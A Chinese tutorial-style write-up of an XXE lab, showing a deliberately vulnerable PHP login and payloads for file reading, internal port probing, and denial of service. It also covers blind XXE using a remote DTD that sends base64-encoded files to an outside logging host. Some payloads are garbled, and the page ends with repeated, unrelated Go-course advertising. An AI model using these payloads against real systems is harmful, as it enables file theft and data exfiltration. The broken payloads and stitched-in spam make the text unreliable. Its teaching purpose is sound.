WEB常见漏洞之XXE（靶场篇）_220 vmware authentication daemon version 1

而JavaScript脚本的doLogin()函数如下所示：

从上图中可以看出，JavaScirpt脚本会将用户输入的username和password转化成xml格式的数据，并且利用ajax的方法提交，提交时xml格式的数据被当作Post数据包的内容进行提交。
来到ajax的目标doLogin.php文件，该文件源码如下所示：

<?php``/**``* autor: c0ny1``* date: 2018-2-7``*/`` ``$USERNAME = 'admin'; //账号``$PASSWORD = 'admin'; //密码``$result = null;`` ``libxml_disable_entity_loader(false);``$xmlfile = file_get_contents('php://input');//这里面因为没有xml文档所以用的是php的伪协议来获取我们发送的xml文档`` ``try{` `$dom = new DOMDocument();//创建XML的对象` `$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);//将我们发送的字符串生成xml文档。` `$creds = simplexml_import_dom($dom);//这一步感觉相当于实例化xml文档`` ` `$username = $creds->username;//获取username标签的值` `$password = $creds->password;//获取password标签的值`` ` `if($username == $USERNAME && $password == $PASSWORD){//将获取的值与前面的进行比较。...` `$result = sprintf(" %d%s",1,$username);//注意必须要有username这个标签，不然的话找不到username,就没有了输出了，我们也不能通过回显来获取信息了` `}else{` `$result = sprintf(" %d%s",0,$username);//与上方相同，都会输出username的值，都可以达到我们的目的` `}` `}catch(Exception $e){` `$result = sprintf(" %d%s",3,$e->getMessage());``}`` ``header('Content-Type: text/html; charset=utf-8');``echo $result;``?>

在该PHP文件中，主要是接收POST请求的内容， 并将其转化为XML对象，然后提取XML对象中的username和password字段。然后比对username和password是否相等。注意，在这个靶场中if else语句逻辑似乎出现了错误，相等时result返回的结果应该是0，而不相等时result返回的结果应该是1。

在上述代码中，关键函数如下：

1、libxml_disable_entity_loader(False)

这段代码意思是设置允许PHP加载外部实体，这也是本靶场的漏洞产生主要原因。在生产环境下，需要将这里的False改为True，即可避免产生XXE漏洞。

2、loadXML()

该函数可以将一个输入的字符串转化为DOMDocument对象。

3、simplexml_import_dom

该函数可以把DOM节点转化为SimpleXMLElement对象。

靶场开始

输入任意账号密码进行抓包

观察请求包
发现头部：Accept: application/xml, text/xml, */*; q=0.01

构造XML声明和DTD部分，引用外部实体来进行实体调用

<?xml version="1.0"?>````]>``&test;Mikasa

并且在元素中引用外部实体参数&test

查看回显

一般XXE利用分为两大场景：有回显和无回显。有回显的情况可以直接在页面中看到Payload的执行结果或现象，无回显的情况又称为blind xxe可以使用外带数据通道提取数据``xxe-lab是有回显的

0x03 基础利用

有回显的XXE漏洞

我们先以有回显的XXE漏洞进行测试来看看XXE的利用方式

1.文件读取：

file：/// #file协议读取文件http://url/file.txt #http协议读取站点下的文件PHP://filter #文件流形式读取php文件

但是若是以file和http协议读取.php文件则会报错，因为php文件中含有<>//等特殊字符，xml解析时会当成xml语法进行解析。那我们若是要读取php文件则可以使用

php://filter/read=convert.base64-encode/resource=/etc/hosts

方法对内容进行base64编码，看下面：

PHP://filter/read=convert.base64-encode/resource=D:/phpstudy/WWW/test/Bachang/XXE/php_xxe/doLogin.php

对读取的内容进行base64解码：

2、内网探测

XXE可以访问外部的url，具有和ssrf类似的效果，可以利用xxe进行内网探测
netstat -nao 查看本机端口，选择902端口

DOMDocument::loadXML(http://127.0.0.1:902): failed to open stream: HTTP request failed! 220 VMware Authentication Daemon Version 1.10: SSL Required, ServerDaemonProtocol:SOAP, MKSDisplayProtocol:VNC , , NFCSSL supp in D:\phpstudy\WWW\test\Bachang\XXE\php_xxe\doLogin.php

探测到了902的VMware服务，XXE的内网探测不像SSRF的内网探测那样强大，挺鸡肋的

3.DDOS攻击

该攻击通过构建一项递归的XML定义，在内存中生成十亿个“abc”字符串，从而导致DDOS攻击。原理为构造恶意的XML实体文件耗尽可用内存，因为许多XML解析器在解析XML文档时倾向于将它的整个结构保留在内存中，解析非常慢，造成了拒绝服务器攻击

无回显的XXE漏洞

找了几个靶场没有找到盲注的XXE漏洞，那我们将这题假设为盲注，不看Burp右边的显示
盲注为没有回显的XXE注入，因为没有回显会给我们的判断造成困难，所以我们以以下三种方式判断注入是否成功
前提是需要有一个具有公网ip的主机

1.查看受攻击机的服务器日志2.通过Dnslog平台查看是否进行查询3.Burp Collaborator Everywhere 插件验证

现有两台机器，一台是以BT面板搭建的，具有XXE-lab靶场的CentOS7虚拟机，IP为192.168.1.102

一台是我的windows10主机，以phpstudy搭建而成，IP为192.168.1.101

两台机器可以互通

实验中，我以我的windows主机模拟具有公网ip的主机（因为实战情况下XML解析器只能解析公网ip），通过xxe漏洞读取windows主机上的文件

查看访问日志验证是否具有XXE漏洞查看访问日志验证是否具有XXE漏洞

实验开始：读取公网ip主机中的文件（假设）

1.查看受攻击机的服务器日志

在本题是盲注的情况下右侧返回包中是不存在内容的，而我们要看是否具有XXE漏洞就看是否192.168.1.101的公网ip（假设）上是否收到来自其他主机的访问记录，查看公网ip主机（假设）的apache或nginx访问记录：

可以看到确实收到了受攻击机的访问记录，说明受攻击机解析了XML内容，来访问了我们的公网ip主机（假设是公网ip主机）

基于此，在实战中我们面对盲注时，构造xml内容让其访问我们能够控制的主机，然后查看我们能够控制的主机上是否具有来自受攻击机的访问记录就可确定是否有XML注入。

其实在我们攻击具有XXE漏洞的服务器时，受攻击服务器进行了两次响应，如果查看受攻击的服务器上的日志会发现两条记录：一次是对XML进行解析后对另一台远程服务器的访问，一次是访问服务器自身上具有XXE漏洞的文件。有访问就有回复，另一台我们可以控制的远程服务器上的日志就会记录受攻击服务器的访问记录抛给它一个404.

2.查看DNS解析记录

在攻击中，我们可以使受攻击服务器访问 DNS解析平台——dnslog.cn或ceye.io平台

刷新，可以看到解析记录

说明XML解析成功，访问了74zgsl.dnslog.cn，具有XXE漏洞。

3.利用Burp的Collaborator插件验证

Collaborator插件位于extender模块下的Bapp Store，点击安装即可在左上角打开Collaborator服务器

点击copy to clipboard将随机生成一个url用于测试

将url填入XXE

可以看到Collaborator中收到了DNS解析记录和HTTP访问记录

以上只是说明该服务器具有XXE盲注，而若是要以盲注读取到信息还需要更进一步

盲注读取文件
在我们可以控制的服务器上构造dtd实体

test.dtd

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///www/wwwroot/XXE/READEME.md">``<!ENTITY % int "<!ENTITY % send SYSTEM 'http://eovpu4.ceye.io/?p=%file;'>">

通过加载服务器下的test.dtd文件，将读取的文件传递给 http://eovpu4.ceye.io/?p=%file（该网址后面有解释）

``%remote;%int;%send;``]>

调用过程解释如下：

%remote请求远程vps上的test.dtd%int调用test.dtd中的%file%file获取被攻击服务器上的敏感文件，并传入%send``%send将数据发送到ceye.io上

也解释以下test.dtd文件中的 % 此处如果直接使用%号，会出现报错：

DOMDocument::loadXML(): Entity Value: ‘%’ forbidden except for entities

%不允许出现在 Entity的value中，所以需要将%进行Unicode编码为 % 或者 %(转化成Unicode编码有两种形式，以&#后接十进制数字，&#x后接十六进制数字)

解释以下ceye.io，ceye.io平台， 通过自己的 DNS 服务器和 HTTP 服务器监控 DNS 查询和 HTTP 请求，它还可以创建自定义文件作为在线负载。它可以帮助安全研究人员在测试漏洞（例如 SSRF/XXE/RFI/RCE）时收集信息

演示XXE盲注：

在公网ip上上传test.dtd,内容为：

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///www/wwwroot/XXE/README.md">``<!ENTITY % int "<!ENTITY % send SYSTEM 'http://eovpu4.ceye.io/?p=%file;'>">

对XXE服务器进行攻击：

<?xml version="1.0" encoding="utf-8"?>````%remote;%int;%send;``]>

因为是盲注，所以读取到的内容会发送到http://eovpu4.ceye.io/?p=%file的“p”参数中

放包

去ceye.io查看记录，如下图

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数Go语言工程师，想要提升技能，往往是自己摸索成长或者是报班学习，但对于培训机构动则几千的学费，着实压力不小。自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年Go语言全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友，同时减轻大家的负担。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上Golang知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加V获取：vip1024b （备注Go）

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

s2V64I-1712992597889)]

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上Golang知识点，真正体系化！

由于文件比较大，这里只是将部分目录大纲截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且后续会持续更新

如果你觉得这些内容对你有帮助，可以添加V获取：vip1024b （备注Go）
[外链图片转存中…(img-C3ZZvrn8-1712992597890)]

一个人可以走的很快，但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎扫码加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！